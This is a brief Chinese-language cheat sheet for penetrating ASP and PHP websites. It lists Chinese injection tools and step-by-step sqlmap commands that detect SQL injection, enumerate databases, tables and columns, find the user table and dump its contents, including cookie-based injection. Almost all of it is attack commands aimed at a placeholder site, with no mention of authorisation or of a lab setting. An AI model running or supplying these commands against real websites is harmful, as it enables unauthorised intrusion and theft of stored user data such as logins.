ASP网站渗透
常用: 明小子,啊D,NBSI,御剑
asp网站常用access(文件数据库)
sqlmap -u "网站"
-u检测是否存在注入漏洞,返回数据库名sqlmap -u "网站" --tables
-tables猜解所有表名
找到用户表
sqlmap -u "网站" --columns -T "表名"
–columns根据表猜解列名
sqlmap -u "网站" --dump -C "列名" -T "表名"
–dump下载数据
PHP网站渗透
检测sqlmap -u "网站"
sqlmap -u "网站" --is-dba
列出所有数据库sqlmap -u "网站" -dbs
查找自己数据库sqlmap -u "网站" --current-db
猜解所有表名,根据数据库查询sqlmap -u "网站" --tables -D"数据库名"
sqlmap -u "网站" --columns -T "表名" -D "数据库名"
查询列的字段sqlmap -u "网站" --dump -C "列名" -T "表名" -D "数据库名"
Cookie注入
sqlmap -u "网站" --cookie "id=参数" --level 2
cookie注入需要提升权限为2
猜解sqlmap -u "网站" --tables --cookie "id=参数" --level 2
sqlmap -u "网站" --columns -T "表名" --cookie "id=参数" --level 2
sqlmap -u "网站" --dump -C "列名" -T "表名" --cookie "id=参数" --level 2